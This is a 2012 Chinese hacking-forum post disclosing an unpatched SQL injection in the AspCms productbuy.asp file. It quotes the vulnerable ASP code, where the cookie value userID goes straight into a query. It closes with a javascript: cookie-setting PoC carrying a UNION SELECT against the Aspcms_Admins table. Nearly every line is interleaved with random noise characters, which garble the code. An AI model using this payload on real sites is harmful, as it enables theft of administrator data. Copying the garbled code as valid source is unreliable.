好久没上土司了,上来一看发现在删号名单内.....
1 `1 D2 ]7 @# }) x( b9 t. W也没啥好发的,前些天路过某个小站,用的AspCms这个系统,搜索了下,productbuy.asp这个文件存在注射,但是目标已经修补....下载了代码,很奇葩的是productbuy.asp这个文件官方虽然修补了网上提到的漏洞,但是就在同一个文件下面找到了注射漏洞。。。。。。。! Y z8 \7 j, E6 f6 j/ O
废话不多说,看代码:
# d# c [' F' x* u2 a+ R3 [* b0 M; Y: U) D1 F" F3 ]$ a- p
<%
. P: g r" x$ i' J8 z/ a
' T/ o. |/ [0 ` I( u9 n7 i* [if action = "buy" then0 a- ]) E6 i! V+ y. [9 e( O0 @
, t; q6 b3 F& d5 A+ [) b addOrder()
' k& A. H8 ?' Q% Z1 M+ m( {8 ]" t1 }, K+ e
else. z! A! t0 a5 u5 D$ w$ E$ ?
- f9 |6 E; Y' r0 S echoContent()0 j' L& E) d2 k& e6 ?7 [! S
5 Y6 L! r3 V8 C5 dend if
, l7 V1 t, ]" d& K9 {9 U+ x1 t5 {
8 Q: C7 o6 g3 d" G- U: V9 ^: m7 U1 l" h1 U# N9 L+ R: u/ k4 J
9 P- ^+ x6 N$ C' [7 {: j9 Z……略过) k/ y4 R( [! e! R }
& Y7 a5 h1 ~/ O( I! ^8 k9 Z! ?7 A r* E/ \: F" C; a
0 V8 `6 {; I. g2 g2 }Sub echoContent()* b) ^4 a3 [! G$ w, O# ?
7 Z7 a7 { n# y1 P dim id
# ?2 F2 c8 p: A& b
' W- t2 g5 Z4 H$ z, _/ v id=getForm("id","get")
$ D2 O, y1 ?3 |$ x& j8 V7 v: \( A6 t
! z- f$ {* i+ f. N+ U
G1 c7 B3 w' B; n1 u3 f
if isnul(id) or not isnum(id) then alertMsgAndGo "请选择产品!","-1" 1 u; s* u& J9 y( S, P' b
4 \, Q3 x% o! t2 M; U& H3 @$ ^% O
9 Y5 `* q! A8 X
1 d4 P) h x7 X
dim templateobj,channelTemplatePath : set templateobj = mainClassobj.createObject("MainClass.template")4 @& p u# r$ r" L* x: ?
, w1 o9 z+ ?: {. a
dim typeIds,rsObj,rsObjtid,Tid,rsObjSmalltype,rsObjBigtype,selectproduct
! B- X6 N8 M7 e, H ?) k8 Y
" [1 k5 c1 n# P3 s Dim templatePath,tempStr
9 t( d* f/ ?3 J1 C, x6 k b7 R! q& h5 ~
templatePath = "/"&sitePath&"templates/"&defaultTemplate&"/"&htmlFilePath&"/productbuy.html". _3 ^; h- o% `& S! R! C) W9 s
" [. n' r% [; u7 {/ w; z/ g
3 E! r) M5 _) g
. S4 p5 Z0 H r& e! Z
set rsObj=conn.Exec("select title from aspcms_news where newsID="&id,"r1")
3 _" s6 h$ r& B( d6 t2 Y$ H% W
" E/ o# i) c( E( ^4 I* W | selectproduct=rsObj(0)7 C- w: F9 F5 L2 D+ @9 C
2 x* n I p( I5 Z0 [1 I
& W! z% @( l$ G
- K* ]+ r, Y7 p- I$ s7 |; ` Dim linkman,gender,phone,mobile,email,qq,address,postcode+ T, v4 r y \' V
5 I- C1 k u, T n" N3 U, }
if isnul(rCookie("loginstatus")) then wCookie"loginstatus",06 ^0 y; K5 P+ F) y, A- n
! v7 w+ j( h8 N" s1 _$ K
if rCookie("loginstatus")=1 then
0 N: ^# x5 _% J; y6 n, x5 P5 o9 \- U @. F
set rsObj=conn.Exec("select * from aspcms_Users where UserID="&trim(rCookie("userID")),"r1")
@0 V- p# z( d, B4 K5 |0 w! f
6 w# ~( S8 \0 i) ` r linkman=rsObj("truename")
# H6 Q0 M1 M4 T: m$ w3 t- o' K) m
3 Z" T% P- `$ r# V gender=rsObj("gender")& k& r2 d* f; `2 G8 b
j& T/ I# j9 {4 m, F3 [# Q phone=rsObj("phone")3 x8 e/ u, g* A b! U9 n& q. x1 X( X6 {
* k2 p) u2 B5 J& A% X
mobile=rsObj("mobile")
2 s. b. E$ t/ s7 O* Y* O' t" ?4 t2 @0 ~8 o
email=rsObj("email")# I5 c) l b. C( @! _3 q
p+ V9 E. Z0 G. |" e6 \3 D qq=rsObj("qq")
. M' Z" k2 r) v+ V8 l- d n$ H; a( @4 ?
address=rsObj("address")
& Q/ w; F* |# U) u5 e3 q- Q
, l: V4 t0 T5 _/ ~6 L9 | `" R postcode=rsObj("postcode")
! ]( ^4 a2 D3 p
+ u' @* y- p$ u$ g+ J else
% J, [! ~' b1 p& s
' [1 l" K6 l$ e; }" }, | gender=1
9 D+ M# j5 I( D, O2 Y2 e2 Y8 W5 G8 q2 ?: `- a9 |6 N( K2 ?
end if; @" D/ i+ U+ w& f7 a) |9 q
6 I# u4 _: C% T( t, J3 z6 h rsObj.close(), m- x4 T* ^3 J* U% _9 t: y
+ l* C" W4 D& @0 H' ]8 M % R2 p' F1 y6 @: ~3 x8 ~9 d: i" ^
6 S; [7 H! z, w
with templateObj
" V+ u; b7 q- h! g$ s3 M' C' x( ~$ P* Y/ D" @
.content=loadFile(templatePath)
! Z( E1 {6 M2 B6 x; v' x
( h4 e `/ K/ L! W .parseHtml()% [0 g. v0 k# @ ?; t
4 {# i* z; }2 s .content=replaceStr(.content,"{aspcms:selectproduct}",selectproduct)
2 |6 ]+ @# A8 d A0 d0 Q
9 N# ]& j6 B S. W. ] .content=replaceStr(.content,"[aspcms:linkman]",linkman)
( j$ i9 h$ y" G, ?# b/ _" C5 o2 W6 y2 |5 ?
.content=replaceStr(.content,"[aspcms:gender]",gender) 0 a. `$ U9 I! V9 k, o$ V
1 s9 @' u1 S$ v0 A& T, m& p; u .content=replaceStr(.content,"[aspcms:phone]",phone)
% C/ i1 D) w. G4 T2 M9 u% K) P' Z9 p2 Z- d7 I! i8 j
.content=replaceStr(.content,"[aspcms:mobile]",mobile)
/ R: B- S* Y+ o; Z
a2 `0 }. R- y# |- _( M' o, u .content=replaceStr(.content,"[aspcms:email]",email)
3 M4 o$ k% b* {" T6 x
* z L0 N. f3 U5 T: `2 | .content=replaceStr(.content,"[aspcms:qq]",qq)
" _$ U0 O, l9 p$ Q8 d8 z# s1 a5 u8 u0 ]3 j
.content=replaceStr(.content,"[aspcms:address]",address)
: x7 {# ~3 I% Z& c5 R7 H6 O2 M0 B( }" b$ R- x& o
.content=replaceStr(.content,"[aspcms:postcode]",postcode)
5 V9 ^1 W2 [$ l5 U
, m n% U9 z# P { @) O .parseCommon()
* Y3 l3 t5 k+ z/ g9 A0 l
6 e. _ x+ U& q' E! z& K$ {! I echo .content , G* ?- z/ }' ]$ i r4 }1 \9 c
/ n4 d2 l/ U( X end with! u2 O, \" f5 @4 @9 ^0 b+ r2 F5 R
9 H) U; ^+ q" \
set templateobj =nothing : terminateAllObjects3 ?5 p" u$ i6 e2 p. \* d
0 q3 m. b1 u+ S6 m, b! sEnd Sub+ [7 N1 |1 W! {
漏洞很明显,没啥好说的
3 Z$ x$ z! q2 |( r- upoc:6 w b' b+ D2 T" ]5 i
+ d) ]3 @+ f) W6 C7 l
javascript:alert(document.cookie="loginstatus=" + escape("1"));alert(document.cookie="userID=" + escape("1 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2 from [Aspcms_Admins]"));另外,脚本板块没权限发帖子+ n1 r& Z4 r. l# U& C
# E5 l( Z. D! E& q& {9 @ ?
|
发表于 2012-12-27 08:35:05
收藏
支持
反对